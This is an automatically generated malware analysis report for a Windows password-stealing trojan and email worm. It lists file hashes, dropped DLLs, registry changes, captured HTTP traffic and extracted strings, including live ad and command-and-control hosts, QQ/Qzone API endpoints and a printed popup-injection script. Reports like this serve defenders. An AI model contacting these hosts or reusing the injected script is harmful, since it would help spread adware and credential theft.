Gen.Variant.Strictor.70570_89f4a39f82

by malwarelabrobot on June 21st, 2017 in Malware Descriptions.

Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 89f4a39f829a6973d4415a4581002b4c
SHA1: ee86964b75f2c06a57e78e389ff37a6448c99783
SHA256: 093d3bae4c983cb56b6588ce3ed5751262dc093fcbe2ff3da7ae3bb572d342b5
SSDeep: 24576:1OxQnugI9Mz3lVuOAQvsF6mBmy2TZaqdiXSp0c02uFG6dAk3CMsetCOv14cC8:1Ox8TqQv0/2TZaqdwk0c05HGisQ28
Size: 2187264 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2017-06-01 10:06:01
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users' passwords.

Payload

Behaviour: EmailWorm
Description: Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3188

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\kjkjz1[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz13[1].htm (503 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssggd1[1].htm (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EE3IW6XC.txt (231 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjzgg1[1].htm (1466 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T62H1GAA.txt (231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\qqkjz12[1].htm (1273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz11[1].htm (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (77 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GN113R0R.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (77 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\57FH349C.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016102820161029 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G380XWV8.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101020161017\index.dat (0 bytes)

Registry activity

The process %original file name%.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheRepair" = "0"
"CachePrefix" = ":2017062020170621:"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017062020170621]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Tracing\89f4a39f829a6973d4415a4581002b4c_RASMANCS]
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016101020161017]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016102820161029]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????????????
Product Name: ???????????????
Product Version: 5.9.0.0
Legal Copyright: ???????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.9.0.0
File Description: ???????????????
Comments: ???????????????
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 831571 835584 4.51473 ab7a08f7e94f5db0f50e49f07a197f31
.rdata 839680 1227274 1228800 5.1873 16c302cd2e18728a018c665e00e7854f
.data 2068480 315050 86016 3.60789 76e9f58750083d0dde6b120f0036a883
.rsrc 2383872 29708 32768 3.58206 4d869b6a853497953ad122bc4c3aac5f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /ad/gjgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 15198
Content-Type: text/html
Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT
Accept-Ranges: bytes
ETag: "8228749e62cbd11:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:07 GMT

<<< skipped >>>

GET /ad/mcgg456.htm HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: ad.7532.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 4406
Content-Type: text/html
Last-Modified: Wed, 02 Mar 2016 05:01:52 GMT
Accept-Ranges: bytes
ETag: "a8b4a0a24074d11:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:08 GMT

<<< skipped >>>

GET /19059730.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Encoding: gzip
Last-Modified: Tue, 07 Mar 2017 07:34:34 GMT
Accept-Ranges: bytes
ETag: "95b649441597d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Tue, 20 Jun 2017 01:39:00 GMT
Content-Length: 972

<<< skipped >>>

GET /close.php?uid=1130 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz12.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: popup.jointreport-switch.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: tengine
Date: Tue, 20 Jun 2017 01:38:34 GMT
Content-Type: text/html; charset=gb2312
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache, must-revalidate
Set-Cookie: lgPTN20963270664410=0; expires=Tue, 20-Jun-2017 16:00:00 GMT; path=/; domain=.jointreport-switch.com

<<< skipped >>>

GET /1546091/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjzgg1.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache8.l2hk1[0,503-0,M], cache26.l2hk1[10013,0], cache9.de1[10529,503-0,M], cache8.de1[30000,10529,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Tue, 20 Jun 2017 01:39:15 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: c31b1fd014979227146297101e


GET /setup/a.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: ad.51pc114.cn


HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT
Accept-Ranges: bytes
ETag: "3efdd9d93cadcf1:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:02 GMT
[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]


GET /ad/qqkjz13.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 503
Content-Type: text/html
Last-Modified: Thu, 17 Dec 2015 13:49:22 GMT
Accept-Ranges: bytes
ETag: "6ca0e3bbd138d11:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:07 GMT

<<< skipped >>>

GET /setup/ssxczgg2269.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ad.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:02 GMT

<<< skipped >>>

GET /ad/ssggd1.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/ad/ssggd1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Last-Modified: Fri, 06 Jan 2017 15:11:53 GMT
Accept-Ranges: bytes
ETag: "f231d0362f68d21:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:06 GMT



GET /ad/qqkjz11.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 813
Content-Type: text/html
Last-Modified: Mon, 16 Jan 2017 15:57:38 GMT
Accept-Ranges: bytes
ETag: "8613f6421170d21:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:06 GMT



GET /ad/mcgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT
Accept-Ranges: bytes
ETag: "8222f3642bce1:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:06 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg456.htm">



GET /ad/qqkjzgg1.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 2922
Content-Type: text/html
Last-Modified: Fri, 06 Jan 2017 15:13:44 GMT
Accept-Ranges: bytes
ETag: "46c78b782f68d21:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:07 GMT

<<< skipped >>>

GET /4473463.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Encoding: gzip
Last-Modified: Tue, 07 Mar 2017 05:56:02 GMT
Accept-Ranges: bytes
ETag: "6117d580797d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Tue, 20 Jun 2017 01:39:02 GMT
Content-Length: 977

<<< skipped >>>

GET /1435675/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache8.l2hk1[0,503-0,M], cache20.l2hk1[10013,0], cache9.de1[10518,503-0,M], cache4.de1[30000,10520,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Tue, 20 Jun 2017 01:39:15 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: c31b1fcc14979227154668097e


GET /ad/qqkjz12.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 1273
Content-Type: text/html
Last-Modified: Fri, 09 Dec 2016 13:25:25 GMT
Accept-Ranges: bytes
ETag: "8efaa5b31f52d21:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>......<script language='javascript'>..// ............
......html............var random = {...ad_num : 3,...init : function()
{....n = (Math.floor(Math.random()*random.ad_num 1));....switch(n){...
..case 1:......document.writeln('<script src=\"http:\/\/p.rhgw.net\
/code\/popjs.asp?pid=258920\" charset=\"gb2312\"><\/script>')
;.....break;.....case 2:......document.writeln('<script type=\"text
\/javascript\" src=\"http:\/\/popup.jointreport-switch.com\/close.php?
uid=1130\"><\/script>');.....break;.....case 3:......document
.writeln('<script language=\"javascript\" src=\"http:\/\/u291014.77
8669.com\/fclose.php?id=180495\"><\/script>');.....break;....
}...}..}..random.init();..</script>....<script language="java
script" src="hXXp://u291014.778669.com/fclose.php?id=152695"></s
cript>......................</body>..</html>..
..
..

<<< skipped >>>

GET /setup/kjkjz1.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/setup/kjkjz1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 3
Content-Type: text/html
Last-Modified: Fri, 02 Jun 2017 07:26:22 GMT
Accept-Ranges: bytes
ETag: "2da238971dbd21:2be"
Server: Microsoft-IIS/6.0
Date: Tue, 20 Jun 2017 01:37:07 GMT
5.9


GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1497922737308 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 20 Jun 2017 01:38:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Mon, 19 Jun 2017 08:58:55 GMT
Cache-control: private



GET /go.asp?svid=3&id=4473463&tpages=1&ttimes=1&tzone=3&tcolor=32&sSize=1276,846&referrer=&vpage=http://ad.7532.com/ad/mcgg456.htm&vvtime=1497922757853 HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 20 Jun 2017 01:39:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Mon, 19 Jun 2017 08:59:15 GMT
Cache-control: private


The Trojan connects to the servers at the following location(s):

%original file name%.exe_3188:

.text
`.rdata
@.data
.rsrc
wininet.dll
kernel32.dll
ole32.dll
SkinH_EL.dll
advapi32.dll
user32.dll
dc.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
ReportError
WebBrowser
?hXXp://ad.51pc114.cn/setup/ssxczgg2269.txt
hXXp://VVV.7532.com/thread-145964-1-1.html
122.228.204.12
hXXp://blog.sina.com.cn/s/blog_81b5163c0102vw7z.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
0@hXXp://123.51pc114.cn/ad/ssggd1.htm
Adodb.Stream
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
51pc114.cn
123.51pc114.cn
hXXp://123.51pc114.cn/setup/kjkjz1.htm
Www.7532.com
hXXp://qlogo2.store.qq.com/qzone/
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
8926356713
hXXp://api.t.qq.com/qzApp/appHomePage.php?index=1&home=1&apiType=5&g_tk=
hXXp://z.t.qq.com/mb/qzone/index.html
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
"loginedUser"
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.5.0
application/x-www-form-urlencoded
hXXp://api.t.qq.com/old/follow.php
hXXp://api.t.qq.com/proxy.html
hXXp://z.t.qq.com/mb/qzone/index.html#
&veriCode=&lieuId=&apiType=5&apiHost=http://api.t.qq.com&g_tk=
&apiType=5&apiHost=http://api.t.qq.com&_r=
hXXp://api.t.qq.com/qzApp/appUserTweets.php?filter=0&uid=
hXXp://api.t.qq.com/old/unfollow.php
hXXp://ad.51pc114.cn/setup/yinyue.html
.html
hXXp://y.qq.com/y/static/singer/
&loginUin=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_add.fcg?singermid=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_getnum.fcg?singermid=
hXXp://user.qzone.qq.com/p/g/fcg-bin/cgi_emotion_list.fcg?uin=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: user.qzone.qq.com
Referer: hXXp://user.qzone.qq.com/
X-Real-Url: hXXp://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
&zb_url=http://i.gtimg.cn/qzone/space_item/pre/1/1_1.gif
&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
/?t=0.11051907816539691&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=
qzreferrer=http://user.qzone.qq.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
hXXp://VVV.7532.com
hXXp://VVV.7532.com/forum-49-1.html
mailto:shenglin_yu@126.com
hXXp://ad.51pc114.cn/setup/a.html
regsvr32 /s winhttp.dll
WinHttp
hXXp://123.51pc114.cn/setup/QQljz1.html
\dc.dll
@.reloc
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
KERNEL32.dll
GdiplusShutdown
gdiplus.dll
WSOCK32.dll
MSVCP60.dll
ReportError_A
VBYB_ReportError
VB_ReportError
uu_loginA
uu_loginW
uu_reportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
